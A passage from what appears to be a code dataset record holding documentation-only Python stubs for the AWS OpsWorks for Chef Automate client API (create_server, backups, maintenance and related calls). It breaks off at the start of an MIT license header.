1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n", "step-4": "<mask token>\n\n\ndef associate_node(ServerName=None, NodeName=None, EngineAttributes=None):\n \"\"\"\n See also: AWS API Documentation\n \n \n :example: response = client.associate_node(\n ServerName='string',\n NodeName='string',\n EngineAttributes=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n\n :type NodeName: string\n :param NodeName: [REQUIRED]\n\n :type EngineAttributes: list\n :param EngineAttributes: \n (dict) --A name/value pair that is specific to the engine of the server.\n Name (string) --The name of the engine attribute.\n Value (string) --The value of the engine attribute.\n \n \n\n :rtype: dict\n :return: {\n 'NodeAssociationStatusToken': 'string'\n }\n \n \n :returns: \n (dict) --\n NodeAssociationStatusToken (string) --\n \n \n \n \"\"\"\n pass\n\n\ndef can_paginate(operation_name=None):\n \"\"\"\n Check if an operation can be paginated.\n \n :type operation_name: string\n :param operation_name: The operation name. This is the same name\n as the method name on the client. For example, if the\n method name is create_foo, and you'd normally invoke the\n operation as client.create_foo(**kwargs), if the\n create_foo operation can be paginated, you can use the\n call client.get_paginator('create_foo').\n\n \"\"\"\n pass\n\n\ndef create_backup(ServerName=None, Description=None):\n \"\"\"\n Creates an application-level backup of a server. While the server is BACKING_UP , the server can not be modified and no additional backup can be created.\n Backups can be created for RUNNING , HEALTHY and UNHEALTHY servers.\n This operation is asnychronous.\n By default 50 manual backups can be created.\n A LimitExceededException is thrown then the maximum number of manual backup is reached. A InvalidStateException is thrown when the server is not in any of RUNNING, HEALTHY, UNHEALTHY. A ResourceNotFoundException is thrown when the server is not found. A ValidationException is thrown when parameters of the request are not valid.\n See also: AWS API Documentation\n \n \n :example: response = client.create_backup(\n ServerName='string',\n Description='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server that you want to back up.\n \n\n :type Description: string\n :param Description: A user-defined description of the backup.\n\n :rtype: dict\n :return: {\n 'Backup': {\n 'BackupArn': 'string',\n 'BackupId': 'string',\n 'BackupType': 'AUTOMATED'|'MANUAL',\n 'CreatedAt': datetime(2015, 1, 1),\n 'Description': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'PreferredBackupWindow': 'string',\n 'PreferredMaintenanceWindow': 'string',\n 'S3DataSize': 123,\n 'S3DataUrl': 'string',\n 'S3LogUrl': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServerName': 'string',\n 'ServiceRoleArn': 'string',\n 'Status': 'IN_PROGRESS'|'OK'|'FAILED'|'DELETING',\n 'StatusDescription': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ToolsVersion': 'string',\n 'UserArn': 'string'\n }\n }\n \n \n :returns: \n (string) --\n \n \"\"\"\n pass\n\n\ndef create_server(DisableAutomatedBackup=None, Engine=None, EngineModel=\n None, EngineVersion=None, EngineAttributes=None, BackupRetentionCount=\n None, ServerName=None, InstanceProfileArn=None, InstanceType=None,\n KeyPair=None, PreferredMaintenanceWindow=None, PreferredBackupWindow=\n None, SecurityGroupIds=None, ServiceRoleArn=None, SubnetIds=None,\n BackupId=None):\n \"\"\"\n Creates and immedately starts a new Server. The server can be used once it has reached the HEALTHY state.\n This operation is asnychronous.\n A LimitExceededException is thrown then the maximum number of server backup is reached. A ResourceAlreadyExistsException is raise when a server with the same name already exists in the account. A ResourceNotFoundException is thrown when a backupId is passed, but the backup does not exist. A ValidationException is thrown when parameters of the request are not valid.\n By default 10 servers can be created. A LimitExceededException is raised when the limit is exceeded.\n When no security groups are provided by using SecurityGroupIds , AWS OpsWorks creates a new security group. This security group opens the Chef server to the world on TCP port 443. If a KeyName is present, SSH access is enabled. SSH is also open to the world on TCP port 22.\n By default, the Chef Server is accessible from any IP address. We recommend that you update your security group rules to allow access from known IP addresses and address ranges only. To edit security group rules, open Security Groups in the navigation pane of the EC2 management console.\n See also: AWS API Documentation\n \n \n :example: response = client.create_server(\n DisableAutomatedBackup=True|False,\n Engine='string',\n EngineModel='string',\n EngineVersion='string',\n EngineAttributes=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n BackupRetentionCount=123,\n ServerName='string',\n InstanceProfileArn='string',\n InstanceType='string',\n KeyPair='string',\n PreferredMaintenanceWindow='string',\n PreferredBackupWindow='string',\n SecurityGroupIds=[\n 'string',\n ],\n ServiceRoleArn='string',\n SubnetIds=[\n 'string',\n ],\n BackupId='string'\n )\n \n \n :type DisableAutomatedBackup: boolean\n :param DisableAutomatedBackup: Enable or disable scheduled backups. Valid values are true or false . The default value is true .\n\n :type Engine: string\n :param Engine: The configuration management engine to use. Valid values include Chef .\n\n :type EngineModel: string\n :param EngineModel: The engine model, or option. Valid values include Single .\n\n :type EngineVersion: string\n :param EngineVersion: The major release version of the engine that you want to use. Values depend on the engine that you choose.\n\n :type EngineAttributes: list\n :param EngineAttributes: Engine attributes on a specified server.\n Attributes accepted in a createServer request:\n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is not stored by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n (dict) --A name/value pair that is specific to the engine of the server.\n Name (string) --The name of the engine attribute.\n Value (string) --The value of the engine attribute.\n \n \n\n :type BackupRetentionCount: integer\n :param BackupRetentionCount: The number of automated backups that you want to keep. Whenever a new backup is created, AWS OpsWorks for Chef Automate deletes the oldest backups if this number is exceeded. The default value is 1 .\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server. The server name must be unique within your AWS account, within each region. Server names must start with a letter; then letters, numbers, or hyphens (-) are allowed, up to a maximum of 32 characters.\n \n\n :type InstanceProfileArn: string\n :param InstanceProfileArn: [REQUIRED]\n The ARN of the instance profile that your Amazon EC2 instances use. Although the AWS OpsWorks console typically creates the instance profile for you, in this release of AWS OpsWorks for Chef Automate, run the service-role-creation.yaml AWS CloudFormation template, located at https://s3.amazonaws.com/opsworks-stuff/latest/service-role-creation.yaml. This template creates a stack that includes the instance profile you need.\n \n\n :type InstanceType: string\n :param InstanceType: The Amazon EC2 instance type to use. Valid values must be specified in the following format: ^([cm][34]|t2).* For example, c3.large .\n\n :type KeyPair: string\n :param KeyPair: The Amazon EC2 key pair to set for the instance. You may specify this parameter to connect to your instances by using SSH.\n\n :type PreferredMaintenanceWindow: string\n :param PreferredMaintenanceWindow: The start time for a one-hour period each week during which AWS OpsWorks for Chef Automate performs maintenance on the instance. Valid values must be specified in the following format: DDD:HH:MM . The specified time is in coordinated universal time (UTC). The default value is a random one-hour period on Tuesday, Wednesday, or Friday. See TimeWindowDefinition for more information.\n Example: Mon:08:00 , which represents a start time of every Monday at 08:00 UTC. (8:00 a.m.)\n \n\n :type PreferredBackupWindow: string\n :param PreferredBackupWindow: The start time for a one-hour period during which AWS OpsWorks for Chef Automate backs up application-level data on your server if backups are enabled. Valid values must be specified in one of the following formats:\n HH:MM for daily backups\n DDD:HH:MM for weekly backups\n The specified time is in coordinated universal time (UTC). The default value is a random, daily start time.\n Example: 08:00 , which represents a daily start time of 08:00 UTC.Example: Mon:08:00 , which represents a start time of every Monday at 08:00 UTC. (8:00 a.m.)\n \n\n :type SecurityGroupIds: list\n :param SecurityGroupIds: A list of security group IDs to attach to the Amazon EC2 instance. If you add this parameter, the specified security groups must be within the VPC that is specified by SubnetIds .\n If you do not specify this parameter, AWS OpsWorks for Chef Automate creates one new security group that uses TCP ports 22 and 443, open to 0.0.0.0/0 (everyone).\n (string) --\n \n\n :type ServiceRoleArn: string\n :param ServiceRoleArn: [REQUIRED]\n The service role that the AWS OpsWorks for Chef Automate service backend uses to work with your account. Although the AWS OpsWorks console typically creates the service role for you, in this release of AWS OpsWorks for Chef Automate, run the service-role-creation.yaml AWS CloudFormation template, located at https://s3.amazonaws.com/opsworks-stuff/latest/service-role-creation.yaml. This template creates a stack that includes the service role that you need.\n \n\n :type SubnetIds: list\n :param SubnetIds: The IDs of subnets in which to launch the server EC2 instance.\n Amazon EC2-Classic customers: This field is required. All servers must run within a VPC. The VPC must have 'Auto Assign Public IP' enabled.\n EC2-VPC customers: This field is optional. If you do not specify subnet IDs, your EC2 instances are created in a default subnet that is selected by Amazon EC2. If you specify subnet IDs, the VPC must have 'Auto Assign Public IP' enabled.\n For more information about supported Amazon EC2 platforms, see Supported Platforms .\n (string) --\n \n\n :type BackupId: string\n :param BackupId: If you specify this field, AWS OpsWorks for Chef Automate creates the server by using the backup represented by BackupId.\n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n\n\ndef delete_backup(BackupId=None):\n \"\"\"\n Deletes a backup. You can delete both manual and automated backups.\n This operation is asynchronous.\n A InvalidStateException is thrown then a backup is already deleting. A ResourceNotFoundException is thrown when the backup does not exist. A ValidationException is thrown when parameters of the request are not valid.\n See also: AWS API Documentation\n \n \n :example: response = client.delete_backup(\n BackupId='string'\n )\n \n \n :type BackupId: string\n :param BackupId: [REQUIRED]\n The ID of the backup to delete. Run the DescribeBackups command to get a list of backup IDs. Backup IDs are in the format ServerName-yyyyMMddHHmmssSSS .\n \n\n :rtype: dict\n :return: {}\n \n \n \"\"\"\n pass\n\n\ndef delete_server(ServerName=None):\n \"\"\"\n Deletes the server and the underlying AWS CloudFormation stack (including the server's EC2 instance). The server status updated to DELETING . Once the server is successfully deleted, it will no longer be returned by DescribeServer requests. If the AWS CloudFormation stack cannot be deleted, the server cannot be deleted.\n This operation is asynchronous.\n A InvalidStateException is thrown then a server is already deleting. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.delete_server(\n ServerName='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The ID of the server to delete.\n \n\n :rtype: dict\n :return: {}\n \n \n \"\"\"\n pass\n\n\ndef describe_account_attributes():\n \"\"\"\n Describes your account attributes, and creates requests to increase limits before they are reached or exceeded.\n This operation is synchronous.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_account_attributes()\n \n \n :rtype: dict\n :return: {\n 'Attributes': [\n {\n 'Name': 'string',\n 'Maximum': 123,\n 'Used': 123\n },\n ]\n }\n \n \n \"\"\"\n pass\n\n\ndef describe_backups(BackupId=None, ServerName=None, NextToken=None,\n MaxResults=None):\n \"\"\"\n Describes backups. The results are ordered by time, with newest backups first. If you do not specify a BackupId or ServerName, the command returns all backups.\n This operation is synchronous.\n A ResourceNotFoundException is thrown when the backup does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_backups(\n BackupId='string',\n ServerName='string',\n NextToken='string',\n MaxResults=123\n )\n \n \n :type BackupId: string\n :param BackupId: Describes a single backup.\n\n :type ServerName: string\n :param ServerName: Returns backups for the server with the specified ServerName.\n\n :type NextToken: string\n :param NextToken: NextToken is a string that is returned in some command responses. It indicates that not all entries have been returned, and that you must run at least one more request to get remaining items. To get remaining results, call DescribeBackups again, and assign the token from the previous results as the value of the nextToken parameter. If there are no more results, the response object's nextToken parameter value is null . Setting a nextToken value that was not returned in your previous results causes an InvalidNextTokenException to occur.\n\n :type MaxResults: integer\n :param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results.\n\n :rtype: dict\n :return: {\n 'Backups': [\n {\n 'BackupArn': 'string',\n 'BackupId': 'string',\n 'BackupType': 'AUTOMATED'|'MANUAL',\n 'CreatedAt': datetime(2015, 1, 1),\n 'Description': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'PreferredBackupWindow': 'string',\n 'PreferredMaintenanceWindow': 'string',\n 'S3DataSize': 123,\n 'S3DataUrl': 'string',\n 'S3LogUrl': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServerName': 'string',\n 'ServiceRoleArn': 'string',\n 'Status': 'IN_PROGRESS'|'OK'|'FAILED'|'DELETING',\n 'StatusDescription': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ToolsVersion': 'string',\n 'UserArn': 'string'\n },\n ],\n 'NextToken': 'string'\n }\n \n \n :returns: \n (string) --\n \n \"\"\"\n pass\n\n\ndef describe_events(ServerName=None, NextToken=None, MaxResults=None):\n \"\"\"\n Describes events for a specified server. Results are ordered by time, with newest events first.\n This operation is synchronous.\n A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_events(\n ServerName='string',\n NextToken='string',\n MaxResults=123\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server for which you want to view events.\n \n\n :type NextToken: string\n :param NextToken: NextToken is a string that is returned in some command responses. It indicates that not all entries have been returned, and that you must run at least one more request to get remaining items. To get remaining results, call DescribeEvents again, and assign the token from the previous results as the value of the nextToken parameter. If there are no more results, the response object's nextToken parameter value is null . Setting a nextToken value that was not returned in your previous results causes an InvalidNextTokenException to occur.\n\n :type MaxResults: integer\n :param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results.\n\n :rtype: dict\n :return: {\n 'ServerEvents': [\n {\n 'CreatedAt': datetime(2015, 1, 1),\n 'ServerName': 'string',\n 'Message': 'string',\n 'LogUrl': 'string'\n },\n ],\n 'NextToken': 'string'\n }\n \n \n \"\"\"\n pass\n\n\ndef describe_node_association_status(NodeAssociationStatusToken=None,\n ServerName=None):\n \"\"\"\n See also: AWS API Documentation\n \n \n :example: response = client.describe_node_association_status(\n NodeAssociationStatusToken='string',\n ServerName='string'\n )\n \n \n :type NodeAssociationStatusToken: string\n :param NodeAssociationStatusToken: [REQUIRED]\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n\n :rtype: dict\n :return: {\n 'NodeAssociationStatus': 'SUCCESS'|'FAILED'|'IN_PROGRESS'\n }\n \n \n :returns: \n (dict) --\n NodeAssociationStatus (string) --\n \n \n \n \"\"\"\n pass\n\n\ndef describe_servers(ServerName=None, NextToken=None, MaxResults=None):\n \"\"\"\n Lists all configuration management servers that are identified with your account. Only the stored results from Amazon DynamoDB are returned. AWS OpsWorks for Chef Automate does not query other services.\n This operation is synchronous.\n A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_servers(\n ServerName='string',\n NextToken='string',\n MaxResults=123\n )\n \n \n :type ServerName: string\n :param ServerName: Describes the server with the specified ServerName.\n\n :type NextToken: string\n :param NextToken: NextToken is a string that is returned in some command responses. It indicates that not all entries have been returned, and that you must run at least one more request to get remaining items. To get remaining results, call DescribeServers again, and assign the token from the previous results as the value of the nextToken parameter. If there are no more results, the response object's nextToken parameter value is null . Setting a nextToken value that was not returned in your previous results causes an InvalidNextTokenException to occur.\n\n :type MaxResults: integer\n :param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results.\n\n :rtype: dict\n :return: {\n 'Servers': [\n {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n },\n ],\n 'NextToken': 'string'\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n\n\ndef disassociate_node(ServerName=None, NodeName=None, EngineAttributes=None):\n \"\"\"\n See also: AWS API Documentation\n \n \n :example: response = client.disassociate_node(\n ServerName='string',\n NodeName='string',\n EngineAttributes=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n\n :type NodeName: string\n :param NodeName: [REQUIRED]\n\n :type EngineAttributes: list\n :param EngineAttributes: \n (dict) --A name/value pair that is specific to the engine of the server.\n Name (string) --The name of the engine attribute.\n Value (string) --The value of the engine attribute.\n \n \n\n :rtype: dict\n :return: {\n 'NodeAssociationStatusToken': 'string'\n }\n \n \n :returns: \n (dict) --\n NodeAssociationStatusToken (string) --\n \n \n \n \"\"\"\n pass\n\n\ndef generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None,\n HttpMethod=None):\n \"\"\"\n Generate a presigned url given a client, its method, and arguments\n \n :type ClientMethod: string\n :param ClientMethod: The client method to presign for\n\n :type Params: dict\n :param Params: The parameters normally passed to\n ClientMethod.\n\n :type ExpiresIn: int\n :param ExpiresIn: The number of seconds the presigned url is valid\n for. By default it expires in an hour (3600 seconds)\n\n :type HttpMethod: string\n :param HttpMethod: The http method to use on the generated url. By\n default, the http method is whatever is used in the method's model.\n\n \"\"\"\n pass\n\n\ndef get_paginator(operation_name=None):\n \"\"\"\n Create a paginator for an operation.\n \n :type operation_name: string\n :param operation_name: The operation name. This is the same name\n as the method name on the client. For example, if the\n method name is create_foo, and you'd normally invoke the\n operation as client.create_foo(**kwargs), if the\n create_foo operation can be paginated, you can use the\n call client.get_paginator('create_foo').\n\n :rtype: L{botocore.paginate.Paginator}\n \"\"\"\n pass\n\n\ndef get_waiter():\n \"\"\"\n \n \"\"\"\n pass\n\n\ndef restore_server(BackupId=None, ServerName=None, InstanceType=None,\n KeyPair=None):\n \"\"\"\n Restores a backup to a server that is in a RUNNING , FAILED , or HEALTHY state. When you run RestoreServer, the server's EC2 instance is deleted, and a new EC2 instance is configured. RestoreServer maintains the existing server endpoint, so configuration management of all of the server's client devices should continue to work.\n This operation is asynchronous.\n A InvalidStateException is thrown when the server is not in a valid state. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.restore_server(\n BackupId='string',\n ServerName='string',\n InstanceType='string',\n KeyPair='string'\n )\n \n \n :type BackupId: string\n :param BackupId: [REQUIRED]\n The ID of the backup that you want to use to restore a server.\n \n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server that you want to restore.\n \n\n :type InstanceType: string\n :param InstanceType: The type of the instance to create. Valid values must be specified in the following format: ^([cm][34]|t2).* For example, c3.large . If you do not specify this parameter, RestoreServer uses the instance type from the specified backup.\n\n :type KeyPair: string\n :param KeyPair: The name of the key pair to set on the new EC2 instance. This can be helpful if any of the administrators who manage the server no longer have the SSH key.\n\n :rtype: dict\n :return: {}\n \n \n :returns: \n (dict) --\n \n \"\"\"\n pass\n\n\ndef start_maintenance(ServerName=None):\n \"\"\"\n Manually starts server maintenance. This command can be useful if an earlier maintenance attempt failed, and the underlying cause of maintenance failure has been resolved. The server will switch to UNDER_MAINTENANCE state, while maintenace is in progress.\n Maintenace can only be started for HEALTHY and UNHEALTHY servers. A InvalidStateException is thrown otherwise. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.start_maintenance(\n ServerName='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server on which to run maintenance.\n \n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n (string) --\n \n \"\"\"\n pass\n\n\ndef update_server(DisableAutomatedBackup=None, BackupRetentionCount=None,\n ServerName=None, PreferredMaintenanceWindow=None, PreferredBackupWindow\n =None):\n \"\"\"\n Updates settings for a server.\n This operation is synchronous.\n See also: AWS API Documentation\n \n \n :example: response = client.update_server(\n DisableAutomatedBackup=True|False,\n BackupRetentionCount=123,\n ServerName='string',\n PreferredMaintenanceWindow='string',\n PreferredBackupWindow='string'\n )\n \n \n :type DisableAutomatedBackup: boolean\n :param DisableAutomatedBackup: Setting DisableAutomatedBackup to true disables automated or scheduled backups. Automated backups are enabled by default.\n\n :type BackupRetentionCount: integer\n :param BackupRetentionCount: Sets the number of automated backups that you want to keep.\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server to update.\n \n\n :type PreferredMaintenanceWindow: string\n :param PreferredMaintenanceWindow: \n DDD:HH:MM (weekly start time) or HH:MM (daily start time).\n Time windows always use coordinated universal time (UTC).\n Valid strings for day of week (DDD ) are: Mon, Tue, Wed, Thr, Fri, Sat, Sun.\n \n\n :type PreferredBackupWindow: string\n :param PreferredBackupWindow: \n DDD:HH:MM (weekly start time) or HH:MM (daily start time).\n Time windows always use coordinated universal time (UTC).\n Valid strings for day of week (DDD ) are: Mon, Tue, Wed, Thr, Fri, Sat, Sun.\n \n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n\n\ndef update_server_engine_attributes(ServerName=None, AttributeName=None,\n AttributeValue=None):\n \"\"\"\n Updates engine specific attributes on a specified server. Server will enter the MODIFYING state when this operation is in progress. Only one update can take place at a time.\n This operation can be use to reset Chef Server main API key (CHEF_PIVOTAL_KEY ).\n This operation is asynchronous.\n This operation can only be called for HEALTHY and UNHEALTHY servers. Otherwise a InvalidStateException is raised. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.update_server_engine_attributes(\n ServerName='string',\n AttributeName='string',\n AttributeValue='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server to update.\n \n\n :type AttributeName: string\n :param AttributeName: [REQUIRED]\n The name of the engine attribute to update.\n \n\n :type AttributeValue: string\n :param AttributeValue: The value to set for the attribute.\n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n", "step-5": "'''\n\nThe MIT License (MIT)\n\nCopyright (c) 2016 WavyCloud\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED 